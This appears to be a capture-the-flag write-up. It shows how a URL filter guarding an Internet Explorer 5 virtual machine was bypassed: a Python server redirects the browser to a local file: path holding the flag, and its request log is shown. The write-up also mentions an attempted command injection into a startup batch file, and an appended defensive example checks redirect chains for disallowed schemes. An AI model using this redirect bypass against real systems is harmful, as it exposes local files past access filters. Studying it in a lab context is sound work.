Tags: misc 

We are provided with a web page on which we can submit a URL. This URL is subsequently included in a startup .bat file in a Windows NT virtual machine running under QEMU. The web page also includes some obfuscated client-side JavaScript that determines whether the URL is valid. Upon submitting a valid URL, the VM starts and opens the URL using Internet Explorer 5. Once we submit the URL, the web page can no longer be interacted with. This means that we can only view the screen of the VM, but not send mouse or keyboard events to it through the web page. We must therefore ensure that the flag is visible on screen somehow.

The first attempt to solve this challenge is to provide a file URL, like so: `file:///A:/flag.txt`. However, this is not considered a valid URL by the filter, as indicated by the error message:
```
ERROR: Illegal URL found, haxor?
```

The VM that is used is also provided for download. We find the startup script that is used to launch Internet Explorer with our URL at `C:\WOW.bat`.

![Batch script](https://i.imgur.com/2vvfcBH.png)

```bat
@echo off
START C:\MSIE50\IEXPLORE.EXE "http://10.0.2.2"
EXIT
```

Our second attempt is to perform command injection in order to open Notepad with the flag after loading a URL. Unfortunately, the filter also flags this attempt as an illegal URL, like before.

Once we figured out that the VM is able to connect to other IP addresses on the LAN, it became clear that it is possible to make it connect to our machine. We create a simple Python web server that redirects any incoming GET request to the location of the flag.

The server looked as follows:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Port 80, matching the "Started httpserver on port 80" output
PORT_NUMBER = 80

# This class handles any incoming request from
# the browser
class myHandler(BaseHTTPRequestHandler):

    # Handler for the GET requests
    def do_GET(self):
        # Answer every GET with a redirect to the flag file
        self.send_response(301)
        self.send_header('Location', 'file:///A:/flag.txt')
        self.end_headers()
        return

try:
    # Create a web server and define the handler to manage the
    # incoming requests
    server = HTTPServer(('', PORT_NUMBER), myHandler)
    print('Started httpserver on port', PORT_NUMBER)

    # Wait forever for incoming HTTP requests
    server.serve_forever()

except KeyboardInterrupt:
    print('^C received, shutting down the web server')
    server.socket.close()
```

Now we start the web server and submit our IP address as the URL. After booting up, the machine sends us a GET request and is redirected as explained above.

```bash
$ sudo python webserver.py
Started httpserver on port 80
51.15.117.201 - - [09/May/2019 16:34:53] "GET / HTTP/1.0" 301 -
```

The VM starts and opens Internet Explorer 5, which is redirected to the flag on the system.

![Flag](https://i.imgur.com/LKQIJPm.png)

Voilà, challenge solved.
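
The filter only inspected the submitted string, so the `file:` scheme reached the browser through the redirect instead. The following is an added example, not part of the original write-up or the challenge's code: a server-side pre-flight check that walks the redirect chain and rejects any hop outside an allow-list of schemes. The names `check_redirect_chain`, `RedirectToFile` and `demo`, and the http/https allow-list, are assumptions made for illustration.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # assumption: the VM should only browse the web
REDIRECT_CODES = {301, 302, 303, 307, 308}

def check_redirect_chain(url, max_hops=5):
    """Follow redirects by hand; return (ok, reason). Every hop must use an allowed scheme."""
    for _ in range(max_hops + 1):
        parts = urlsplit(url)
        if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
            return False, "blocked scheme in chain: " + url
        cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
        conn = cls(parts.hostname, parts.port, timeout=5)
        try:
            path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
            conn.request("GET", path)
            resp = conn.getresponse()
            status, location = resp.status, resp.getheader("Location")
        finally:
            conn.close()
        if status not in REDIRECT_CODES or not location:
            return True, "final URL: " + url
        url = urljoin(url, location)  # an absolute Location (e.g. file:) replaces the URL
    return False, "too many redirects"

class RedirectToFile(BaseHTTPRequestHandler):
    """Constructed local test server that answers like the redirector in the write-up."""
    def do_GET(self):
        self.send_response(301)
        self.send_header("Location", "file:///A:/flag.txt")
        self.end_headers()
    def log_message(self, *args):  # keep the demo quiet
        pass

def demo():
    """Start the constructed server on a free loopback port and run the check against it."""
    server = HTTPServer(("127.0.0.1", 0), RedirectToFile)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return check_redirect_chain("http://127.0.0.1:%d/" % server.server_port)
    finally:
        server.shutdown()
        server.server_close()

if __name__ == "__main__":
    print(demo())
```

A remote server can answer the pre-flight request differently from the browser's later request, so this check complements, rather than replaces, keeping local files out of reach of the browsing VM.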